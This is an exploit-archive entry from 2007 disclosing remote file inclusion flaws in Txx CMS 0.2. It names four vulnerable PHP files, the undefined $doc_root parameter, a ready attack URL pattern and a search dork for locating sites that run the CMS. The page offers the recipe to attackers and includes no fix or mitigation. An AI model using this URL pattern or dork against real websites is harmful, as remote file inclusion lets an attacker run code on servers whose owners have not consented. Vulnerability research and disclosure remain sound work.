[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-09-08
# Author : Nice Name Crew
# Previous Title : Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln
# Next Title : Joomla Component Restaurante Remote File Upload Vulnerability
:::::::::::::::::::::::::::::::::::::::::::::::::::.......................
::| | (_) | | | / ____|
::| | |_ ___ ___ | | | __ _ _ __ ___ ___ | | _ __ _____ __
::| . ` | |/ __/ _ | . ` |/ _` | '_ ` _ / _ | | | '__/ _ / / /
::| | | | (_| __/ | | | (_| | | | | | | __/ | |____| | | __/ V V /
::|_| _|_|______| |_| _|__,_|_| |_| |_|___| _____|_| ___| _/_/
:::::::::::::::::::::::::::::We got the nicest name in the security scene!
::::::::Info::.
::Script: Txx CMS
::Homepage:https://sourceforge.net/projects/txx/
::
:::::::::Details::.
::Type: File_Inclusion
::Dork: "txx cms"
::
::in modules/addons/plugin.php
::and modules/addons/sidebar.php
::and modules/mail/index.php
::and modules/mail/mailbox.php
::
::$doc_root is not defined
::
::http://site.com/modules/addons/plugin.php?doc_root=[vuln]
::
::
:: we also found countless xss in there
:: but we wont list em because we got more important
:: stuff to do
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: nne@chilloutzone.eu
::Website: http://nnc.unkn0wn.eu or http://www.chilloutzone.eu
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
# www.Syue.com [2007-09-08]